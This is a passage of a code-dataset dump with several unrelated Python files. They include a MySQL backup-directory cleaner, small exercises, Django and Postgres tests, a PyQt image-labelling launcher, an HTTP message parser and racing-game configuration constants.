\\d{4}-\\d{1,2}-\\d{1,2}T\\d{1,2}-\\d{1,2}-\\d{1,2}-\\d{4,6})\"\n)\n\n\n@dataclass\nclass ClearTask(object):\n \"\"\"\n 清理任务对象\n \"\"\"\n\n path: Path\n\n @property\n def rename_at(self):\n \"\"\"根据目录名,计算出目录备份的时间点\"\"\"\n # 目录的后缀是 “2023-05-29T20-23-32-472128” 这个格式,也就是说它不是一个正确的时间日期格式\n # 如果我们要得到 datetime 对象,还要给它整一下才行\n match = backup_dir_re_pattern.search(str(self.path))\n dt_str = match.group(\"dt\")\n date_str, tm_str = dt_str.split(\"T\")\n hour, minte, seconde, ms = tm_str.split(\"-\")\n datetime_str = \"{} {}:{}:{}.{}\".format(date_str, hour, minte, seconde, ms)\n return datetime.fromisoformat(datetime_str)\n\n def is_expired(self, now=None):\n \"\"\"\n 检查 rename 文件是否已经过期了\n \"\"\"\n match = backup_dir_re_pattern.search(str(self.path))\n # 用传好格式构造 datetime 对象\n if match:\n now = datetime.now() if now is None else now\n delta = now - self.rename_at\n if (\n delta.total_seconds()\n >= dbm_agent_config.mysql_clear_instance_expire_time\n ):\n return True\n # 没有匹配到正则、或是没有超过 3 天\n return False\n\n def is_empty(self):\n return len(self.glob()) == 0\n\n def glob(self):\n \"\"\"\n 返回 path 目录下的所有文件和目录\n \"\"\"\n return glob.glob(\"{}/*\".format(self.path))\n\n def __post_init__(self):\n \"\"\"\n init 完成之后先检查一下,实例有没有过期,过期了的话就先把目录给它扫出来\n \"\"\"\n self.dirs = []\n self.files = []\n if self.is_expired():\n # 过期了就分别把目录、文件保存到 dirs 和 files 中去\n for item in self.glob():\n item = Path(item)\n if item.is_dir():\n self.dirs.append(item)\n else:\n self.files.append(item)\n\n\ndef scan_data_dir_gen_task():\n \"\"\"只扫描 binlog 目录和 data 目录;至于 backup 目录这个是交由备份子系统完成\n\n Returns:\n --------\n [ClearTask,ClearTask ...]\n \"\"\"\n logging.info(messages.FUN_STARTS.format(fname()))\n\n result = []\n target_dirs = [\n dbm_agent_config.mysql_datadir_parent,\n dbm_agent_config.mysql_binlogdir_parent,\n ]\n for path in target_dirs:\n # 处理一下路径的格式,让它可以满足 glob.glob 的要求\n if path.endswith(\"/\"):\n target = path + \"*\"\n else:\n target = path + \"/*\"\n\n logging.info(\"scan dir '{}' .\".format(target))\n\n # 逐个比较找到 ${port}-backup-xxx 格式的备份目录\n for instance_path in glob.glob(target):\n if backup_dir_re_pattern.search(instance_path):\n logging.info(\"find '{}' .\".format(instance_path))\n # 构造 ClearTask 对象\n task = ClearTask(instance_path)\n if task.is_expired():\n result.append(task)\n else:\n logging.info(\n \"instance '{}' backup not expired .\".format(instance_path)\n )\n\n logging.info(messages.FUN_ENDS.format(fname()))\n return result\n\n\ndef clear_instance(task: ClearTask = None):\n \"\"\"\n 根据 ClearTask 中指定的目录进行清理动作\n \"\"\"\n logging.info(messages.FUN_STARTS.format(fname()))\n logging.info(\n \"task.path = '{}' is_expire = '{}' \".format(task.path, task.is_expired())\n )\n\n # 先清理文件\n for path in task.files:\n logging.info(\"deal-with file '{}' \".format(path))\n # 准备清理\n while True:\n # 如果文件比较大,那么就一直 truncate 到 0 为止\n chunck = truncate_or_delete_file(path, 16 * 1024 * 1024)\n time.sleep(1)\n if chunck == 0:\n # chunck == 0 说明文件已经执行 remove 清理掉了\n logging.info(\"file '{}' removed \".format(path))\n break\n else:\n logging.info(\"file '{}' truncated \".format(path))\n\n # 清理子目录\n for sub in task.dirs:\n clear_instance(ClearTask(sub))\n\n # 如果当前目录下已经没有文件、子目录了 就清理掉当前目录\n if task.is_empty():\n logging.info(\n \"sub directorys not exists, rm current directory '{}' \".format(task.path)\n )\n shutil.rmtree(task.path)\n\n logging.info(messages.FUN_ENDS.format(fname()))\n\n\ndef pub_clear_task_thread():\n \"\"\"\n 生成后台清理任务的线程函数\n \"\"\"\n global keep_threads_running\n while keep_threads_running:\n try:\n 
logging.info(messages.FUN_STARTS.format(fname()))\n            tasks = []\n            with sudo():\n                tasks = scan_data_dir_gen_task()\n            for task in tasks:\n                clear_tasks.append(task)\n            logging.info(messages.FUN_ENDS.format(fname()))\n        except Exception as err:\n            logging.exception(err)\n\n        # sleep for a while after each scan pass\n        time.sleep(dbm_agent_config.mysql_scan_thread_sleep_time)\n\n\ndef sub_clear_task_thread():\n    \"\"\"\n    Take tasks off the queue and perform the cleanup.\n    \"\"\"\n    global keep_threads_running\n    while keep_threads_running:\n        try:\n            logging.info(messages.FUN_STARTS.format(fname()))\n            try:\n                task = clear_tasks.pop()\n            except IndexError as err:\n                logging.info(\"task deque is empty .\")\n                logging.info(messages.FUN_ENDS.format(fname()))\n                # sleep when there are no tasks in the queue\n                time.sleep(dbm_agent_config.mysql_clear_empty_task_sleep_time)\n                continue\n\n            with sudo():\n                clear_instance(task)\n            logging.info(messages.FUN_ENDS.format(fname()))\n        except Exception as err:\n            logging.exception(err)\n\n\ndef start_clear_tasks():\n    threads.submit(pub_clear_task_thread)\n    time.sleep(3)\n    threads.submit(sub_clear_task_thread)\n","repo_name":"Neeky/dbm-agent","sub_path":"dbma/components/mysql/backends/clears.py","file_name":"clears.py","file_ext":"py","file_size_in_byte":7758,"program_lang":"python","lang":"zh","doc_type":"code","stars":169,"dataset":"github-code","pt":"37"}
+{"seq_id":"23400854260","text":"import math \nprint('For quadratic equation ax**2+bx+c=0, enter the coefficients')\na=int(input('Enter a:'))\nb=int(input('Enter b:'))\nc=int(input('Enter c:'))\nif a==0:\n    print('Value of a should not be zero')\n    print('\\n Aborting !!!!')\nelse:\n    d=(b*b)-(4*a*c)\n    if d>0:\n        r1=(-b+math.sqrt(d))/(2*a)\n        r2=(-b-math.sqrt(d))/(2*a)\n        print('Roots are real and unequal')\n        print('Root1=',r1,'Root2=',r2)\n    elif d==0:\n        r1=(-b)/(2*a)\n        print('Roots are real and equal')\n        print('Root=',r1)\n    else:\n        print('Roots are complex and imaginary')","repo_name":"Tridev4/Python-codes","sub_path":"quadratic_eqn.py","file_name":"quadratic_eqn.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37261789355","text":"from common import create_linked_list, print_linked_list\nfrom models.linked_list_node import LinkedListNode\n\nnode_id = 0\n\n\ndef sort_linked_list(first_node: LinkedListNode):\n    current_node = first_node\n    prev_current_node = None\n    while current_node is not None:\n        prev_compare_node = current_node\n        compare_node = current_node.next\n        while compare_node is not None:\n            if compare_node.value < current_node.value:\n                swap_nodes(prev_current_node, current_node, prev_compare_node)\n                if current_node is first_node:\n                    first_node = compare_node\n                temp = current_node\n                current_node = compare_node\n                compare_node = temp\n            else:\n                prev_compare_node = compare_node\n            compare_node = compare_node.next\n        prev_current_node = current_node\n        current_node = current_node.next\n    return first_node\n\n\ndef swap_nodes(before_left_node, left_node: LinkedListNode, before_right_node: LinkedListNode):\n    right_node = before_right_node.next\n    if before_left_node is not None:\n        before_left_node.next = right_node\n    before_right_node.next = left_node\n    temp = left_node.next\n    left_node.next = right_node.next\n    right_node.next = temp\n\n\ndef remove_duplicates_from_unsorted(first_node):\n    values = []\n    current_node = first_node\n    prev_node = None\n    while current_node is not None:\n        if current_node.value in values:\n            prev_node.next = current_node.next\n        else:\n            values.append(current_node.value)\n            prev_node = 
current_node\n        current_node = current_node.next\n\n\ndef remove_duplicates_from_unsorted2(first_node):\n    current_node = first_node\n    while current_node.next is not None:\n        compare_node = current_node\n        while compare_node.next is not None:\n            if compare_node.next.value == current_node.value:\n                compare_node.next = compare_node.next.next\n            compare_node = compare_node.next\n        current_node = current_node.next\n    return first_node\n\n\ndef remove_duplicates_from_sorted(first_node):\n    current_node = first_node\n    prev_node = None\n    while current_node is not None:\n        if prev_node is not None and prev_node.value == current_node.value:\n            prev_node.next = current_node.next\n        else:\n            prev_node = current_node\n        current_node = current_node.next\n\n\nif __name__ == '__main__':\n    node_count = 20\n    first_node = create_linked_list(node_count)\n    print_linked_list('With duplicates unsorted:', first_node)\n    print()\n\n    remove_duplicates_from_unsorted2(first_node)\n    print_linked_list('Duplicates removed unsorted:', first_node)\n    print()\n\n    first_node = create_linked_list(node_count)\n    print_linked_list('With duplicates unsorted:', first_node)\n    print()\n\n    first_node = sort_linked_list(first_node)\n    print_linked_list('With duplicates sorted (not working yet):', first_node)\n    print()\n\n    remove_duplicates_from_sorted(first_node)\n    print_linked_list('Duplicates removed sorted:', first_node)\n    print()\n","repo_name":"Lemao81/python_code_monkey","sub_path":"linked_list_duplicates.py","file_name":"linked_list_duplicates.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13516252894","text":"import datetime\nimport json\n\n# import unittest\nfrom django.http import HttpRequest\nfrom django.test import TestCase\n\nfrom retirement_api.views import (\n    estimator,\n    get_full_retirement_age,\n    income_check,\n    param_check,\n)\n\n\ntry:\n    from django.urls import reverse\nexcept ImportError:\n    from django.core.urlresolvers import reverse\n\n\ntoday = datetime.datetime.now().date()\n\nPARAMS = {\n    \"dobmon\": 8,\n    \"dobday\": 14,\n    \"yob\": 1970,\n    \"earnings\": 70000,\n    \"lastYearEarn\": \"\",  # possible use for unemployed or already retired\n    \"lastEarn\": \"\",  # possible use for unemployed or already retired\n    \"retiremonth\": \"\",  # leave blank to get triple calculation -- 62, 67 and 70\n    \"retireyear\": \"\",  # leave blank to get triple calculation -- 62, 67 and 70\n    \"dollars\": 1,  # benefits to be calculated in current-year dollars\n    \"prgf\": 2,\n}\n\n\nclass ViewTests(TestCase):\n    req_good = HttpRequest()\n    req_good.GET[\"dob\"] = \"1955-05-05\"\n    req_good.GET[\"income\"] = \"40000\"\n    req_blank = HttpRequest()\n    req_blank.GET[\"dob\"] = \"\"\n    req_blank.GET[\"income\"] = \"\"\n    req_invalid = HttpRequest()\n    req_invalid.GET[\"dob\"] = \"1-2-%s\" % (today.year + 5)\n    req_invalid.GET[\"income\"] = \"x\"\n    return_keys = [\"data\", \"error\"]\n\n    def test_base_view(self):\n        url = reverse(\"retirement_api:claiming_en\")\n        response = self.client.get(url)\n        self.assertTrue(response.status_code == 200)\n        url = reverse(\"retirement_api:claiming_es\")\n        response = self.client.get(url)\n        self.assertTrue(response.status_code == 200)\n\n    def test_param_check(self):\n        self.assertEqual(param_check(self.req_good, \"dob\"), \"1955-05-05\")\n        self.assertEqual(param_check(self.req_good, \"income\"), \"40000\")\n        self.assertEqual(param_check(self.req_blank, \"dob\"), None)\n        self.assertEqual(param_check(self.req_blank, \"income\"), 
None)\n\n def test_income_check(self):\n self.assertEqual(income_check(\"544.30\"), 544)\n self.assertEqual(income_check(\"$55,000.15\"), 55000)\n self.assertEqual(income_check(\"0\"), 0)\n self.assertEqual(income_check(\"x\"), None)\n self.assertEqual(income_check(\"\"), None)\n\n def test_get_full_retirement_age(self):\n request = self.req_blank\n response = get_full_retirement_age(request, birth_year=\"1953\")\n self.assertTrue(json.loads(response.content) == [66, 0])\n response2 = get_full_retirement_age(request, birth_year=1957)\n self.assertTrue(json.loads(response2.content) == [66, 6])\n response3 = get_full_retirement_age(request, birth_year=1969)\n self.assertTrue(json.loads(response3.content) == [67, 0])\n response4 = get_full_retirement_age(request, birth_year=969)\n self.assertTrue(response4.status_code == 400)\n\n def test_estimator_url_data(self):\n request = self.req_blank\n response = estimator(request, dob=\"1955-05-05\", income=\"40000\")\n self.assertIsInstance(response.content, bytes)\n rdata = json.loads(response.content)\n for each in self.return_keys:\n self.assertTrue(each in rdata.keys())\n\n def test_estimator_url_data_bad_income(self):\n request = self.req_blank\n response = estimator(request, dob=\"1955-05-05\", income=\"z\")\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_url_data_bad_dob(self):\n request = self.req_blank\n response = estimator(request, dob=\"1955-05-xx\", income=\"4000\")\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_query_data(self):\n request = self.req_good\n response = estimator(request)\n self.assertTrue(response.status_code == 200)\n self.assertIsInstance(response.content, bytes)\n rdata = json.loads(response.content)\n for each in self.return_keys:\n self.assertTrue(each in rdata.keys())\n\n def test_estimator_query_data_blank(self):\n request = self.req_blank\n response = estimator(request)\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_query_data_blank_dob(self):\n request = self.req_blank\n response = estimator(request, income=\"40000\")\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_query_data_blank_income(self):\n request = self.req_blank\n response = estimator(request, dob=\"1955-05-05\")\n self.assertTrue(response.status_code == 400)\n\n def test_estimator_query_data_bad_income(self):\n request = self.req_invalid\n response = estimator(request, dob=\"1955-05-05\")\n self.assertTrue(response.status_code == 400)\n\n def test_about_pages(self):\n url = reverse(\"retirement_api:retirement_about_en\")\n response = self.client.get(url)\n self.assertTrue(response.status_code == 200)\n url = reverse(\"retirement_api:retirement_about_es\")\n response = self.client.get(url)\n self.assertTrue(response.status_code == 200)\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/retirement_api/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"25708653620","text":"'''\n\nMove the code you previously wrote to calculate how many seconds are in a year into this file.\nThen execute it as a script to see the output printed to your console.\n\n'''\ndays = 365.25\nhours_in_a_day = 24\nminutes_in_an_hour = 60\nsecond_in_a_minute = 60\nseconds_in_a_year = (days * hours_in_a_day * minutes_in_an_hour * second_in_a_minute)\nx = \"There are\"\ny = \"seconds in a year.\"\nz = seconds_in_a_year\nprint 
(x,z,y)","repo_name":"igorlongoria/python-fundamentals","sub_path":"01_python_fundamentals/01_02_seconds_years.py","file_name":"01_02_seconds_years.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73754182186","text":"#!/usr/bin/env python\n\nimport random\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\n\ndef new_points(range, x_array, y_array):\n    new_x_array = []\n    new_y_array = []\n    for j in x_array: \n        error_x = random.randint(-2,-2)\n        new_x = j + error_x\n        new_x_array.append(new_x)\n        \n        error_y = random.randint(-2,2)\n        new_y = y_array[x_array.index(j)] + error_y \n        new_y_array.append(new_y)\n        \n    return new_x_array, new_y_array\n\n\n\n    \n    ","repo_name":"mahajabinrahman/quantum_mixture","sub_path":"noise_generator.py","file_name":"noise_generator.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2365812937","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# COMP90055 Computing Project\n# Supervisor: Prof. Richard Sinnott\n# 874204 Liangmu ZHU\n# @ Master of Information Technology\n# Contact: liangmuz@student.unimelb.edu.au\n\nimport os, sys\nfrom PyQt4.QtGui import *\nfilename = \"test_photos/9929959995_6e31b94d8b_o.jpg\"\n# Create a PyQt4 application object.\napp = QApplication(sys.argv)\n\n# The QWidget widget is the base class of all user interface objects in PyQt4.\nwindow = QWidget()\n\n# Set window size.\nwindow.resize(480, 320)\n\n# Set window title\nwindow.setWindowTitle(\"Melbourne Landmark Identification\")\n\n# Get filename using QFileDialog\ndef browse():\n    #global filename\n    # print file contents\n    # with open(filename, 'r') as file:\n\n    label1 = QLabel(window)\n    filename = QFileDialog.getOpenFileName(window, 'Open File', '/')\n    pixmap = QPixmap(filename)\n    label1.setPixmap(pixmap)\n    window.resize(pixmap.width() + 150, pixmap.height() + 100)\n    vbox = QVBoxLayout(window)\n    vbox.addWidget(label1)\n    buttonCommand = \"python -m scripts.label_image --graph tf_files/retrained_graph.pb --image \" + str(filename)\n    os.system(buttonCommand)\n\ndef calculate():\n    #global filename\n\n    recordtext = open('record.txt','r')\n    finaltext = recordtext.readlines()[1].upper()\n    QMessageBox.about(window, \"Landmark similarity\", finaltext)\n\n# Add buttons\nbutton1 = QPushButton('Select a photo!', window)\n\nbutton1.clicked.connect(browse)\nbutton1.resize(button1.sizeHint())\nbutton1.move(10, 10)\n\nbutton2 = QPushButton('Which landmark?', window)\n\nbutton2.clicked.connect(calculate)\nbutton2.resize(button2.sizeHint())\nbutton2.move(210, 10)\n\n# Show window\nwindow.show()\n\nsys.exit(app.exec_())\n","repo_name":"nilaoyezhu/Melbourne_Landmark_Identification","sub_path":"launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"70198929069","text":"import pytest\nfrom aqueduct_executor.operators.connectors.data import dataframe, postgres\nfrom aqueduct_executor.operators.connectors.tests import conf, utils\n\n_TABLE = \"test_postgres\"\n\n\n@pytest.mark.skipif(conf.SKIP_POSTGRES, reason=\"Skip Postgres Flag Set\")\nclass TestPostgres:\n    @classmethod\n    def setup_class(cls):\n        # Setup connector\n        config = conf.POSTGRES_CONF\n        conn = postgres.PostgresConnector(config)\n        cls.conn = conn\n\n        # Setup test dataframe\n        cls.test_df 
= utils.sample_df()\n\n    @classmethod\n    def teardown_class(cls):\n        cls.conn.engine.connect().execute(\"DROP TABLE IF EXISTS {} CASCADE;\".format(_TABLE))\n\n    def test_authenticate(self):\n        utils.authenticate_test(self.conn)\n\n    @pytest.mark.dependency()\n    def test_load(self):\n        params = {dataframe.LOAD_PARAMS_TABLE_KEY: _TABLE}\n        utils.load_test(self.conn, params, self.test_df)\n\n    @pytest.mark.dependency(depends=[\"TestPostgres::test_load\"])\n    def test_extract(self):\n        params = {dataframe.EXTRACT_PARAMS_QUERY_KEY: \"SELECT * FROM {};\".format(_TABLE)}\n        utils.extract_test(self.conn, params, expected_df=self.test_df)\n","repo_name":"aqueducthq/aqueduct","sub_path":"src/python/aqueduct_executor/operators/connectors/tests/test_postgres.py","file_name":"test_postgres.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"37"}
+{"seq_id":"13782955634","text":"from urlparse import urlparse, urlunsplit\n\nclass HTTPRequest(object):\n    host = None\n    url = None\n    version = None\n    port = None\n    scheme = None\n    method = None\n    path = None\n    headers = []\n    body = None\n\n    def __init__(self):\n        raise NotImplementedError(\"interface description\")\n\nclass HTTPResponse(object):\n    version = None\n    status = None\n    reason = None\n    headers = []\n    body = None\n\n    def __init__(self):\n        raise NotImplementedError(\"Base Implementation\")\n\n    def get_header(self,header,caseinsensitive=True):\n        raise NotImplementedError(\"Base Implementation\")\n\nclass RawHTTPRequest(HTTPRequest):\n    def __init__(self,data):\n        pos = self.readStatusLine(data,0)\n        pos = self.readHeaders(data,pos)\n        content_length = filter(lambda x: x[0].lower() == \"content-length\", self.headers)\n        if len(content_length) == 1:\n            length = int(content_length[0][1])\n            self.body = data[pos:pos+length]\n            pos = pos+length\n        if len(content_length) > 1:\n            raise ValueError(\"Too many content-length headers!\")\n\n        self.remainder = data[pos:]\n\n    def __str__(self):\n        buf = \"%s %s HTTP/%s\\r\\n\" % (self.method,self.path,self.version)\n        for k,v in self.headers:\n            buf += \"%s: %s\\r\\n\" % (k,v)\n        buf += \"\\r\\n\"\n        if self.body is not None and self.body != \"\":\n            buf += self.body\n        return buf\n\n    version = None\n    port = 80\n    scheme = 'http'\n    method = None\n    path = None\n    headers = []\n    body = None\n\n    @property\n    def host(self):\n        return self.get_header('host')\n\n    @property\n    def url(self):\n        netloc = None\n        host = self.host if (self.host.find(':') == -1) else \"[%s]\" % self.host\n\n        if (('https' == self.scheme and 443 == self.port) or\n            ('http' == self.scheme and 80 == self.port)):\n            netloc = host\n        else:\n            netloc = \"%s:%d\" % (self.host,self.port)\n        return urlunsplit((self.scheme,netloc,self.path,None,None))\n\n    def readStatusLine(self,data,pos):\n        # Request-Line: Method SP Request-URI SP HTTP-Version CRLF\n        pos = self.readMethod(data,pos)\n        pos = self.readPath(data,pos)\n        pos = self.readVersion(data,pos)\n        return pos\n\n    def readMethod(self,data,pos):\n        end = data[pos:].find(\" \")\n        self.method = data[pos:pos+end]\n        return pos+end+1\n\n    def readPath(self,data,pos):\n        end = data[pos:].find(\" \")\n        self.path = data[pos:pos+end]\n        return pos+end+1\n\n    def readVersion(self,data,pos):\n        if \"HTTP/\" != data[pos:pos+5]:\n            raise ValueError(\"Not HTTP-Version string at %d\" % pos)\n        self.version = data[pos+5:pos+8]\n        return pos+10\n\n\n    def readHeaders(self,data,pos):\n        self.headers = []\n        cur = pos\n        end = 
data[cur:].find(\"\\r\\n\")\n        while end != 0:\n            header = data[cur:cur+end]\n            cur = cur+end+2\n            end = data[cur:].find(\"\\r\\n\")\n            while data[cur] in (\" \",\"\\t\"):\n                header += data[cur:cur+end]\n                cur = cur+end+2\n                end = data[cur:].find(\"\\r\\n\")\n            self.headers.append(header.split(': ',1))\n        return cur+2 \n\n    def get_header(self,header,caseinsensitive=True):\n        for k,v in self.headers:\n            if caseinsensitive:\n                if k.lower() == header.lower():\n                    return v\n            else:\n                if k == header:\n                    return v\n\n\nclass RawHTTPResponse(HTTPResponse):\n    def __init__(self,data):\n        pos = self.readStatusLine(data,0)\n        pos = self.readHeaders(data,pos)\n        content_length = filter(lambda x: x[0].lower() == \"content-length\", self.headers)\n        if len(content_length) == 1:\n            length = int(content_length[0][1])\n            self.body = data[pos:pos+length]\n            pos = pos+length\n        if len(content_length) > 1:\n            raise ValueError(\"Too many content-length headers!\")\n\n        self.remainder = data[pos:]\n\n    def __str__(self):\n        buf = \"HTTP/%s %s %s\\r\\n\" % (self.version,self.status,self.reason)\n        for k,v in self.headers:\n            buf += \"%s: %s\\r\\n\" % (k,v) \n        buf += \"\\r\\n\"\n        if self.body is not None:\n            buf += self.body\n        return buf\n\n\n    def readStatusLine(self,data,pos):\n        # HTTP-Version SP Status-Code SP Reason-Phrase CRLF\n        pos = self.readVersion(data,pos)\n        pos = self.readStatusCode(data,pos)\n        pos = self.readReasonPhrase(data,pos)\n        return pos\n\n    def readStatusCode(self,data,pos):\n        self.status = int(data[pos:pos+4])\n        return pos+4\n\n    def readVersion(self,data,pos):\n        if \"HTTP/\" != data[pos:pos+5]:\n            raise ValueError(\"Not HTTP-Version string at %d\" % pos)\n        self.version = data[pos+5:pos+8]\n        return pos+9\n\n    def readReasonPhrase(self,data,pos):\n        end = data[pos:].find(\"\\r\\n\")\n        self.reason = data[pos:pos+end]\n        return pos+end+2\n\n    def readHeaders(self,data,pos):\n        self.headers = []\n        cur = pos\n        end = data[cur:].find(\"\\r\\n\")\n        while end != 0:\n            header = data[cur:cur+end]\n            cur = cur+end+2\n            end = data[cur:].find(\"\\r\\n\")\n            while data[cur] in (\" \",\"\\t\"):\n                header += data[cur:cur+end]\n                cur = cur+end+2\n                end = data[cur:].find(\"\\r\\n\")\n            self.headers.append(header.split(': ',1))\n        return cur+2 \n\n    def get_header(self,header,caseinsensitive=True):\n        for k,v in self.headers:\n            if caseinsensitive:\n                if k.lower() == header.lower():\n                    return v\n            else:\n                if k == header:\n                    return v\n\n\nclass ParamHTTPRequest(HTTPRequest):\n    '''\n    Internal convenience class to generate an HTTP Request\n    '''\n    request_line = b\"%s %s HTTP/1.1\\r\\n\"\n    headers = {}\n    def __init__(self, url, method='GET', headers={},body=None):\n        # parse the URL into a form we can create a GET request with\n        p = urlparse(url)\n        self.method = method\n        self.scheme = p.scheme\n        self.host = p.hostname.strip()\n        self.port = 443 if self.scheme == 'https' else 80\n        self.port = p.port if p.port else self.port\n        self.path = p.path + '?' 
+ p.query if p.query else p.path\n        self.path = '/' if not p.path else self.path\n        self.headers = dict([(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\")]+headers.items())\n        self.body = body\n\n    def __str__(self):\n        # populate all the header format strings and join everything together\n        retval = self.request_line % (self.method, self.path)\n        if not self.headers.has_key(\"Host\"):\n            retval += b\"Host: %s\\r\\n\" % self.host\n\n        retval += '\\r\\n'.join([b\"%s: %s\" % kv for kv in self.headers.items()])\n        retval += '\\r\\n'\n\n        if self.body is not None:\n            if not self.headers.has_key(\"Content-Length\"):\n                retval += b\"Content-Length: %d\\r\\n\" % len(str(self.body))\n            retval += '\\r\\n'\n            retval += str(self.body)\n        else:\n            retval += '\\r\\n'\n\n        return retval\n","repo_name":"CryptoPunk/looper","sub_path":"lib/looper/clients/httputil.py","file_name":"httputil.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}
+{"seq_id":"28907031501","text":"#Important! The game textures are NOT pre-scaled by a factor of 5 (the default)! They are scaled for pygame during initialization. Please keep this in mind! Window size without scaling: 135x100\n#Also: TX, TY are the coordinates of the button text; they are drawn on the button's own surface. BX, BY are the coordinates of the button on the screen.\n\nFONT = \"assets/GAME_FONT.ttf\"\n\nBUTTON_COLORS = [(255, 255, 255), (205, 205, 205), (105, 105, 105)]\nSCREEN_SIZE = [135, 100]\n\n#LABEL_NAME = [\"TYPE\", \"TEXT\", (R, G, B), SIZE, X, Y]\n\nLABEL_HELLOWORLD = [\"Hello World!\", (255, 255, 255), 3, 0, 0]\nLABEL_FPS = [\"FPS:\", (255, 255, 255), 3, 0, 4]\n\nLABLE_TITLE = [\"Лютый Гонщик\", (255, 30, 0), 8, 20, 23]\nLABLE_MAINMENULB1 = [\"1 - 1 Игрок 2 - 2 Игрока\", (255, 255, 30), 3, 19, 58]\nLABLE_TELEGRAM = [\"By AltTeam. TG:t.me/lytigonchic\", (255, 255, 255), 2, 0, SCREEN_SIZE[1] - 2]\nLABLE_SOUNDOFF = [\"Звук Выключен\", (255, 0, 0), 3, 0, SCREEN_SIZE[1] - 3*2]\nLABLE_YOUSCOREINGAME1 = [\"Очки:\", (0, 180, 0), 3, 0, SCREEN_SIZE[1] - 3]\nLABLE_PAUSE = [\"Пауза\", (255, 255, 255), 3, 60, 8.4]\nLABLE_HOWTOEXITFROMPAUSE = [\"Выйти из паузы - ENTER\", (255, 255, 255), 3, 34.6, 90]\nLABLE_GAMEOVER = [\"Game Over!\", (0, 0, 0), 3*4, 10.5, 30]\nLABLE_YOUSCOREINGAME = [\"Ваши очки:\", (0, 0, 0), 3, 48, 47]\nLABLE_RECORD = [\"Рекорд:\", (0, 0, 0), 3, 48, 43.5]\nLABLE_HOWTOSTARTNEWGAME = ['Нажмите \"Enter\" для начала новой игры.', (0, 0, 0), 3, 11.5, 64]\nLABLE_SHOW_FPS = [\"FPS:\", (0, 0, 0), 0.5, 0, 0]\nLABLE_MAINMENULB2 = [\"3 - Настройки\", (255, 255, 30), 3, 46, 65]\nLABLE_OPTMENULB1 = [\"Настройки\", (255, 255, 255), 5, 46, 10]\nLABLE_OPTMENULB2 = [\"Маштаб:\", (255, 255, 255), 3, 10, 30]\nLABLE_OPTMENULB5 = [\"Сенсор. 
Упр:\", (255, 255, 255), 3, 10, 37.9]\nLABLE_OPTMENULB3 = [\"*Нужно выйти из игры для применения некоторых настроек.\", (200, 200, 200), 2, 13, 80]\nLABLE_OPTMENULB4 = [\"Режим фуллскрина:\", (255, 255, 255), 3, 10, 34]\nLABLE_OPTMENULB6 = [\"Звук:\", (255, 255, 255), 3, 10, 41.9]\nLABLE_OPTMENUPATH = [\"Game path:\", (255, 255, 255), 1, 0, 0]\n\n#BUTTON_ИМЯ = [\"ТЕКСТ\" TYPE, BUTTSZX, BUTTSZY, BX, BY]\n# TYPE - ONECL, MULTI\n\nBUTTON_OPTMENUPLUS = [\"+\", \"ONECL\", 5, 5, 35, 28.9]\nBUTTON_OPTMENUMIN = [\"-\", \"ONECL\", 5, 5, 41, 28.9]\nBUTTON_OPTMENUCHFULL = [\"Сменить\", \"ONECL\", 24, 5, 73, 32.9]\nBUTTON_OPTMENUCHONSP = [\"Сменить\", \"ONECL\", 24, 5, 50, 36.5]\nBUTTON_OPTMENUCHSOUN = [\"Сменить\", \"ONECL\", 24, 5, 29, 40.3]\nBUTTON_OPTMENUEXIT = [\"Выйти в меню\", \"ONECL\", 40, 5, SCREEN_SIZE[0]/2-40/2, 86]\n\nBUTTON_GAMEOVER_NEWGAME = [\"Заного\", \"ONECL\", 24, 5, 20, 64]\nBUTTON_GAMEOVER_EXIT = [\"Выйти\", \"ONECL\", 24, 5, SCREEN_SIZE[1]-9, 64]\n\nBUTTON_MAINMENU_ONEPL = [\"1 Игрок\", \"ONECL\", 25, 5, 55, 56]\nBUTTON_MAINMENU_TWOPL = [\"2 Игрока\", \"ONECL\", 25, 5, 55, 62]\nBUTTON_MAINMENU_NOTWOPL = [\"--------\", \"ONECL\", 25, 5, 55, 62]\nBUTTON_MAINMENU_OPTIONS = [\"Настро.\", \"ONECL\", 25, 5, 55, 68]\n\nBUTTON_PLAYING_MUTE = [\"MUTE\", \"ONECL\", 16, 5, 1, 6.3]\nBUTTON_PLAYING_PAUSE = [\"PAUSE\", \"ONECL\", 16, 5, 1, 1]\n\nBUTTON_PAUSE_RETURN = [\"Назад в игру\", \"ONECL\", 38, 5, SCREEN_SIZE[0]/2-38/2, 80]\nBUTTON_MAINMENU_MENU = [\"Меню\", \"ONECL\", 38, 5, SCREEN_SIZE[0]/2-38/2, 86]\nBUTTON_PAUSE_EXITFROMGAME = [\"Выйти из игры\", \"ONECL\", 40, 5, SCREEN_SIZE[0]/2-40/2, 92]\n\nBUTTON_PLAYING_ONEPLMODE_LEFT = [\"<\", \"MULTI\", 10, 10, 10, 80]\nBUTTON_PLAYING_ONEPLMODE_RIGHT = [\">\", \"MULTI\", 10, 10, 115, 80]\n\nBUTTON_PLAYING_TWOPLMODE_P1LEFT = 